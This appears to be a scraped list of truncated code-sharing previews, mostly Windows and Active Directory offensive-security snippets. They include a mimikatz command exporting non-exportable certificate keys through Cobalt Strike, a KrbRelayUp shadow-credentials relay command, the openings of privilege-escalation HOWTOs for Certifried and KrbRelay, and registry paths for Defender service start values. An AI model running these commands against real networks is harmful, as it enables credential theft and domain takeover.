Samirbous

"Top 1000 values of registry.path",Count
"HKLM\SYSTEM\ControlSet001\Services\WinDefend\Start","1,483"
"HKLM\SYSTEM\ControlSet001\Services\UsoSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\WaaSMedicSvc\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\wuauserv\Start","1,477"
"HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService\Start",6
"HKLM\SYSTEM\ControlSet001\Services\Sense\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdBoot\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdFilter\Start",6
"HKLM\SYSTEM\ControlSet001\Services\WdNisDrv\Start",6

Samirbous

#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>


typedef NTSTATUS(NTAPI* pLdrLoadDll) (
	PWCHAR PathToFile,
	ULONG Flags,
	PUNICODE_STRING ModuleFileName,

RistBS

#include <Windows.h>
#include <stdio.h>


#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

#define WORKER_FACTORY_FULL_ACCESS 0xf00ff 

typedef struct _UNICODE_STRING {

tothi

#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#

aniqfakhrul

From Local Workstation to DC

This exploit path will only imply if you have an interactive session on a domain joined workstation regardless the privilege of the account (it could be a low privileged account)

1. Obtain system certificate for the current workstation

KrbRelayUp.exe relay -m shadowcred -f

2. Get the certificate and certificate password.

tothi

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

Wra7h

function Get-ProcessPipes{
    param(
        [Parameter(Mandatory=$false)]
        [string]$CSV,
        [Parameter(Mandatory=$false)]
        [switch]$All
    )

    Add-Type -TypeDefinition  @"
        using System;

tothi

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

• LDAP signing not required on Domain Controller (default!)

jinschoi

#!/usr/bin/env python3

from typing import Iterable, Union, Any

# freq: frequency in Hz
# zerolen: length of space bit in μs
# onelen: length of mark bit in μs
# repeats: number of times to repeat sequence
# pause: time to wait in μs between sequences
# bits: string of ones and zeros to represent sequence

loneicewolf

/*
NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on)
NOTE don't assume or think this is the latest because it's on first on top on the list; it's not.
Version 1 'naive approach' (hard coded values, etc)
gcc -g -o L1 lin_1.c
*/
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#define RP 1234